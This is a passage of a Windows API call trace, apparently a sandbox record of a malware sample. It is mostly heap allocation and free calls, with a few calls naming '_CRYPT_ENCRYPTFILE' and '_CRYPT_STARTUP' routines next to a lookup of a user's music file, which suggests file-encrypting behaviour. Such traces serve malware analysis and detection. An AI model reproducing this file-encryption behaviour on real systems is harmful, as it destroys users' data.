lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0114.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.601] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 1 [0114.601] TranslateMessage (lpMsg=0x144e9a4) returned 0 [0114.601] DispatchMessageW (lpMsg=0x144e9a4) returned 0x0 [0114.601] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0114.602] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0114.602] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0114.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0114.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0114.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0114.602] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0114.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0114.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0114.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0114.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0114.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0114.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0114.602] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0114.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0114.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0114.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0114.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0114.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0114.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359cd8 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0114.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0114.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0114.605] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca2f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0114.605] CloseHandle (hObject=0x258) returned 1 [0114.605] FreeLibrary (hLibModule=0x772d0000) returned 1 [0114.606] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0114.606] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\mxXesXXst_.mp3", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90484ba0, ftCreationTime.dwHighDateTime=0x1d5e43e, ftLastAccessTime.dwLowDateTime=0x6dab5fe0, ftLastAccessTime.dwHighDateTime=0x1d5e580, ftLastWriteTime.dwLowDateTime=0x6dab5fe0, ftLastWriteTime.dwHighDateTime=0x1d5e580, nFileSizeHigh=0x0, nFileSizeLow=0xbdad, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="mxXesXXst_.mp3", cAlternateFileName="MXXESX~1.MP3")) returned 0x41ac280 [0114.606] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0114.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0114.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0114.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0114.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0114.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0114.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0114.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0114.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0114.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0114.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0114.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0114.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0114.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0114.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0114.607] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0114.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca190 [0114.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0114.607] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0114.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0114.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0114.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0114.607] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0114.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1d8 [0114.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0114.607] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0114.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0114.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0114.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0114.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0114.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0114.608] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0114.608] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0114.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca268 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0114.609] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0114.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0114.610] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0114.610] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0114.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0114.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0114.612] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 